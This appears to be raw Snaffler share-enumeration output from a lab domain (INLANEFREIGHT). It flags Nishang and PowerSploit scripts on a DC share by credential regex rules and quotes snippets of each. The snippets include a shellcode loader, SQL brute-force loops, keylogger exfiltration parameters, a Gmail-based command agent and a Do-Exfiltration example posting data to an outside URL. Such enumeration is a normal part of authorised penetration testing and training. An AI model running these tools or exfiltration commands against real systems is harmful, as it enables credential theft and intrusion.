account\.\n\n\.PARAMETER\ WindowsAuthentication\nUse\ this\ switch\ parameter\ to\ use\ Windows\ Authentication\ for\ SQL\ Server\.\n\n\.EXAMPLE\nPS>\ Execute-Command-MSSQL\ -ComputerName\ sqlserv01\ -UserName\ sa\ -Password\ sa1234\n\n\.EXAMPLE\nPS>\ Execute-Command-MSSQL\ -ComputerName\ 192\.168\.1\.10\ -UserName\ sa\ -Password\ sa1234\n\n\.EXAMPLE\nPS>\ Execute-Command-MSSQL\ -ComputerName\ target\ -UserName\ sa\ -Password\ sa1234\nCo [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|6.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Execution\Execute-Command-MSSQL.ps1) \n\ \ \ \ \ \ \ \ \[switch]\n\ \ \ \ \ \ \ \ \$WindowsAuthentication\n\ \ \ \ \)\n\ \ \n\ \ \ \ Try\{\n\ \ \ \ function\ Make-Connection\ \(\$query\)\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$Connection\ =\ New-Object\ System\.Data\.SQLClient\.SQLConnection\n\ \ \ \ \ \ \ \ \$Connection\.ConnectionString\ =\ "Data\ Source=\$ComputerName;Initial\ Catalog=Master;User\ Id=\$userName;Password=\$password;"\n\ \ \ \ \ \ \ \ if\ \(\$WindowsAuthentication\ -eq\ \$True\)\n\ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \$Connection\.ConnectionSt [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Green}<KeepNameContainsGreen|R|secret|8.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Get-LSASecret.ps1) Get-LSASecret.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Green}<KeepNameContainsGreen|R|credential|825B|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Get-WebCredentials.ps1) Get-WebCredentials.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Green}<KeepNameContainsGreen|R|credential|1.6kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Invoke-CredentialsPhish.ps1) Invoke-CredentialsPhish.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.5kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Execution\Execute-DNSTXT-Code.ps1) \ \n\ \ \ \ \[DllImport\("msvcrt\.dll"\)]\ \n\ \ \ \ public\ static\ extern\ IntPtr\ memset\(IntPtr\ dest,\ uint\ src,\ uint\ count\);\ \n'@\ \n\ \ \ \ \$winFunc\ =\ Add-Type\ -memberDefinition\ \$code\ -Name\ "Win32"\ -namespace\ Win32Functions\ -passthru\ \n\ \ \ \ \$size\ =\ 0x1000\ \n\ \ \ \ if\ \(\$sc\.Length\ -gt\ 0x1000\)\ \{\$size\ =\ \$sc\.Length}\ \n\ \ \ \ \$x=\$winFunc::VirtualAlloc\(0,0x1000,\$size,0x40\)\ \n\ \ \ \ for\ \(\$i=0;\$i\ -le\ \(\$sc\.Length-1\);\$i\+\+\)\ \{\$winFunc::memset\(\[In [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.8kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Get-PassHashes.ps1) ,\ \$k6,\ \$k7\)\n\n\ \ \ \ 0\.\.7\ \|\ %\{\n\ \ \ \ \ \ \ \ \$key\[\$_]\ =\ \$odd_parity\[\(\$key\[\$_]\ \*\ 2\)]\n\ \ \ \ }\n\n\ \ \ \ return\ ,\$key\n}\n\nfunction\ NewRC4\(\[byte\[]]\$key\)\n\{\n\ \ \ \ return\ new-object\ Object\ \|\n\ \ \ \ Add-Member\ NoteProperty\ key\ \$key\ -PassThru\ \|\n\ \ \ \ Add-Member\ NoteProperty\ S\ \$null\ -PassThru\ \|\n\ \ \ \ Add-Member\ ScriptMethod\ init\ \{\n\ \ \ \ \ \ \ \ if\ \(-not\ \$this\.S\)\n\ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \[byte\[]]\$this\.S\ =\ 0\.\.255;\n\ \ \ \ \ \ \ \ \ \ \ \ 0\.\.255\ \|\ %\ -begin\{ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|41kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Invoke-SessionGopher.ps1) essionObject\.Password\ =\ \(DecryptWinSCPPassword\ \$WinSCPSessionObject\.Hostname\ \$WinSCPSessionObject\.Username\ \$WinSCPSessionObject\.Password\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\ else\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$WinSCPSessionObject\.Password\ =\ "Saved\ in\ session,\ but\ master\ password\ prevents\ plaintext\ recovery"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \[void]\$ArrayOfWinSCPSessions\.Add\(\$WinSCPSessionObject\)\n\ \ \ \ \ \ \n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|14kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Keylogger.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:06Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|41kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Invoke-SessionGopher.ps1) essionObject\.Password\ =\ \(DecryptWinSCPPassword\ \$WinSCPSessionObject\.Hostname\ \$WinSCPSessionObject\.Username\ \$WinSCPSessionObject\.Password\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\ else\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$WinSCPSessionObject\.Password\ =\ "Saved\ in\ session,\ but\ master\ password\ prevents\ plaintext\ recovery"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \[void]\$ArrayOfWinSCPSessions\.Add\(\$WinSCPSessionObject\)\n\ \ \ \ \ \ \n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPsCredentials|R|-SecureString|10.1kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Pivot\Invoke-NetworkRelay.ps1) =\ \$False,\ ParameterSetName="Show"\)]\n\ \ \ \ \ \ \ \ \[Switch]\n\ \ \ \ \ \ \ \ \$Show\n\n\ \ \ \ \)\n\n\n\ \ \ \ \#Check\ if\ Username\ and\ Password\ are\ provided\n\ \ \ \ if\ \(\$UserName\ -and\ \$Password\)\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$SecurePassword\ =\ ConvertTo-SecureString\ \$Password\ -AsPlainText\ -Force\n\t\ \ \ \ \$Creds\ =\ New-Object\ System\.Management\.Automation\.PSCredential\ \(\$UserName,\ \$SecurePassword\)\n\ \ \ \ }\n\ \ \ \ else\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$Creds\ =\ \$False\n\ \ \ \ }\n\ \ \ \ \n\ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPsCredentials|R|-SecureString|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$webClient\ =\ New-Object\ Net\.WebClient\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$securePassword\ =\ ConvertTo-SecureString\ -AsPlainText\ -String\ \$password\ -Force\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$credential\ =\ New-Object\ -TypeName\ System\.Management\.Automation\.PSCredential\ -ArgumentList\ \$userName,\ \$securePassword\n\ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPsCredentials|R|-SecureString|12.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Scan\Invoke-BruteForce.ps1) \ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$webClient\ =\ New-Object\ Net\.WebClient\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$securePassword\ =\ ConvertTo-SecureString\ -AsPlainText\ -String\ \$password\ -Force\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$credential\ =\ New-Object\ -TypeName\ System\.Management\.Automation\.PSCredential\ -ArgumentList\ \$userName,\ \$securePassword\n\ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|14kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Keylogger.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|666kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Gather\Invoke-MimikatzWDigestDowngrade.ps1) LastError\ =\ true\)]\n\ \ \ \ \ \ \ \ public\ static\ extern\ bool\ LockWorkStation\(\);\n"@\n\ \ \ \ \ \n\ \ \ \ \ \ \ \ \$LockWorkStation\ =\ Add-Type\ -memberDefinition\ \$signature\ -name\ "Win32LockWorkStation"\ -namespace\ Win32Functions\ -passthru\n\ \ \ \ \ \ \ \ \$LockWorkStation::LockWorkStation\(\)\ \|\ Out-Null\n\ \ \ \ \ \ \ \ }\ \n\ \ \ \ \ \ \ \ Write-Verbose\ "Locking\ the\ target\ machine\."\n\ \ \ \ \ \ \ \ Lock-WorkStation\n\n\ \ \ \ }\n}\n\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.1kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Pivot\Invoke-NetworkRelay.ps1) 141\.\ \n\n\.EXAMPLE\nPS\ >\ Invoke-NetworkRelay\ -Relay\ v6tov6\ -ListenAddress\ ::\ -Listenport\ 8888\ -ConnectAddress\ fe80::19ed:c169:128c:b68d\ \ -ConnectPort\ 445\ -ComputerName\ domainpc\ -Username\ bharat\\domainuser\ -Password\ Password1234\nAdd\ a\ network\ relay\ which\ listens\ on\ IPv6\ and\ connects\ to\ IPv6\ and\ forwards\ port\ 445\ from\ fe80::19ed:c169:128c:b68d\ to\ port\ 8888\ of\ domainpc\ \n\n\.EXAMPLE\nPS\ >\ Invoke-NetworkRelay [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|12.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Scan\Invoke-BruteForce.ps1) te-force\ attempts,\ defaults\ to\ 0\.\n\n\.PARAMETER\ Jitter\nJitter\ for\ the\ brute-force\ attempt\ delay,\ defaults\ to\ \+/-\ 0\.3\ \n\n\.EXAMPLE\nPS\ >\ Invoke-BruteForce\ -ComputerName\ SQLServ01\ -UserList\ C:\\test\\users\.txt\ -PasswordList\ C:\\test\\wordlist\.txt\ -Service\ SQL\ -Verbose\nBrute\ force\ a\ SQL\ Server\ SQLServ01\ for\ users\ listed\ in\ users\.txt\ and\ passwords\ in\ wordlist\.txt\n\n\.EXAMPLE\nPS\ >\ Invoke-BruteForce\ -ComputerName\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|12.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Scan\Invoke-BruteForce.ps1) \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ :UsernameLoop\ foreach\ \(\$username\ in\ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Connection\.ConnectionString\ =\ "Data\ Source=\$ComputerName;Initial\ Catalog=Master;User\ Id=\$userName;Password=\$password;"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "Checking\ \$userName\ :\ \$password"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|9.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Shells\Invoke-PoshRatHttps.ps1) Hnlf0heygfIFNRRrvzHzwCf/jBm/4ZnfEE27PBNb358ETy7HvtW7gL7clNJx0iATUz6QH3aWdRiTx9op8jAdOTyY99AK8vek\+YyOsPLL1jA7MB8wBwYFKw4DAhoEFMQTv4RORuVi4juttRObhcARChafBBTpLslMGebrDYuP89Peo8HGC7sEKgICB9A='\n\n\ \ \ \ \$CertPassword\ =\ 'password'\n\ \ \ \ \$CertPinThumbprint\ =\ \(New-Object\ System\.Security\.Cryptography\.X509Certificates\.X509Certificate2\(\[System\.Convert]::FromBase64String\(\$Base64Cert\),\ \$CertPassword\)\)\.Thumbprint\n\n\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.2kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Shells\Invoke-PsGcatAgent.ps1) \ unused\ and\ would\ be\ used\ with\ multiple\ agent\ support\ in\ future\.\ \n\n\.PARAMETER\ Delay\nDelay\ in\ seconds\ after\ a\ successful\ execution\.\ Default\ is\ 60\.\n\n\.EXAMPLE\nPS\ >\ Invoke-PSGcatAgent\ -Username\ psgcatlite\ -password\ pspassword\ -Delay\ 10\nPull\ latest\ command/script\ from\ Gmail\ and\ execute\ with\ a\ delay\ of\ 10\ seconds\.\n\n\.LINK\nhttp://www\.labofapenetrationtester\.com/2015/04/pillage-the-village-powershell-versi [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.8kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Shells\Invoke-PsGcat.ps1) R\ NonInteractive\nUse\ the\ non-interactive\ mode\.\ Execute\ the\ provided\ command\ or\ payload\ and\ exit\.\n\n\.PARAMETER\ GetOutput\nRetrieve\ last\ ouput\ from\ Gmail\.\n\n\.EXAMPLE\nPS\ >\ Invoke-PSGcat\ -Username\ psgcatlite\ -password\ pspassword\nUse\ GetOutput\ to\ get\ output\.\nUse\ Script\ to\ specify\ a\ script\.\nPsGcat:\ Get-Process\nCommand\ sent\ to\ psgcatlite@gmail\.com\n\n\nAbove\ shows\ an\ example\ where\ Get-Process\ is\ sent\ to\ Gmail\. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ :UsernameLoop\ foreach\ \(\$username\ in\ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Connection\.ConnectionString\ =\ "Data\ Source=\$ComputerName;Initial\ Catalog=Master;User\ Id=\$userName;Password=\$password;"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "Checking\ \$userName\ :\ \$password"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|9.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Shells\Invoke-PoshRatHttps.ps1) Hnlf0heygfIFNRRrvzHzwCf/jBm/4ZnfEE27PBNb358ETy7HvtW7gL7clNJx0iATUz6QH3aWdRiTx9op8jAdOTyY99AK8vek\+YyOsPLL1jA7MB8wBwYFKw4DAhoEFMQTv4RORuVi4juttRObhcARChafBBTpLslMGebrDYuP89Peo8HGC7sEKgICB9A='\n\n\ \ \ \ \$CertPassword\ =\ 'password'\n\ \ \ \ \$CertPinThumbprint\ =\ \(New-Object\ System\.Security\.Cryptography\.X509Certificates\.X509Certificate2\(\[System\.Convert]::FromBase64String\(\$Base64Cert\),\ \$CertPassword\)\)\.Thumbprint\n\n\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\C$\IT\Tools\nishang-master\Utility\Do-Exfiltration.ps1) sing\ it\ may\ increase\ chances\ of\ detection\.\nUsually,\ you\ should\ let\ the\ Name\ Server\ of\ target\ to\ resolve\ things\ for\ you\.\n\n\.EXAMPLE\nPS\ >\ Get-Information\ \|\ Do-Exfiltration\ -ExfilOption\ gmail\ -username\ <>\ -Password\ <>\n\nUse\ above\ command\ for\ data\ exfiltration\ to\ gmail\n\n\.EXAMPLE\nPS\ >\ Do-Exfiltration\ -Data\ \(Get-Process\)\ -ExfilOption\ Webserver\ -URL\ http://192\.168\.254\.183/catchpost\.php\n\nUse\ above\ command\ f [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|4.6kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPAutologon.ps1) e-Verbose\ "Potential\ password\ in\ \$File"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#put\ \[BLANK]\ in\ variables\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Password\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$UserName\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#Create\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Green}<KeepNameContainsGreen|R|passw|13.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPPassword.ps1) Get-GPPPassword.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|13.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPPassword.ps1) \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "\[Get-GPPInnerField]\ Unable\ to\ retrieve\ ParentNode\.ParentNode\.LocalName\ for\ '\$File'"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \{\$Password\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\ \{\$UserName\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Changed\)\)\ \{\$Changed\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$NewName\)\)\ \{\$NewNa [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.6kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPAutologon.ps1) e-Verbose\ "Potential\ password\ in\ \$File"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#put\ \[BLANK]\ in\ variables\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Password\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$UserName\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#Create\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:07Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|13.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPPassword.ps1) \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "\[Get-GPPInnerField]\ Unable\ to\ retrieve\ ParentNode\.ParentNode\.LocalName\ for\ '\$File'"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \{\$Password\ =\ '\[BLANK]'}\n\ \ \ \ \ \ \ \ \ \ \ 